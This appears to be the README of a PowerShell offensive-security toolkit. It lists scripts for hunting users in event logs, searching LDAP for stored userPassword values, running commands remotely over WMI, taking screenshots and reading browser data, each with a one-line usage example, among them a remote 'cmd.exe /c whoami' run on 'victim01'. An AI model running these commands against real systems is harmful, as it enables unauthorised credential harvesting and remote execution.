Search-EventForUser.ps1: PowerShell script that searches through the Windows event logs for specific user(s)
Search-FullNameToSamAccount.ps1: Resolve a full name to its SamAccountName
Search-UserPassword.ps1: Search LDAP for the userPassword field
Search-users.ps1: Search-FullNameToSamAccount, Search-EventForUser and Search-UserPassword merged together
Remote-WmiExecute.ps1: Execute command remotely using WMI
Take-Screenshot.ps1: Take a screenshot (PNG)
Get-BrowserHomepage.ps1: Get browser homepage
Get-IEBookmarks.ps1: List all Internet Explorer bookmark URLs
Import-Module .\Search-EventForUser.ps1; Search-EventForUser -TargetUser "MrUn1k0d3r"
Import-Module .\Search-EventForUser.ps1; "MrUn1k0d3r" | Search-EventForUser
Import-Module .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -ComputerName DC01
Import-Module .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -FindDC true
Import-Module .\Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true
Import-Module .\Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true -Username DOMAIN\admin -Password "123456"
The -User parameter supports a single user or a list of users from the pipeline.
Import-Module .\Search-FullNameToSamAccount.ps1; Search-FullNameToSamAccount -Filter *god*
Import-Module .\Search-FullNameToSamAccount.ps1; "god", "mom" | Search-FullNameToSamAccount
Import-Module .\Search-UserPassword.ps1; Search-UserPassword -Username *god*
Import-Module .\Search-UserPassword.ps1; "god", "mom" | Search-UserPassword
Import-Module .\Remote-WmiExecute.ps1; Remote-WmiExecute -ComputerName victim01 -Payload "cmd.exe /c whoami"
Import-Module .\Take-Screenshot.ps1; Take-Screenshot -Path C:\test.png
Import-Module .\Get-BrowserHomepage.ps1; Get-BrowserHomepage
Import-Module .\Get-IEBookmarks.ps1; Get-IEBookmarks
- Remote-WmiExecute.ps1:
  - Improve error handling (Access Denied, etc.)
- Take-Screenshot.ps1:
  - Handle multiple screens
Charles F. Hamilton Aka Mr.Un1k0d3r RingZer0 Team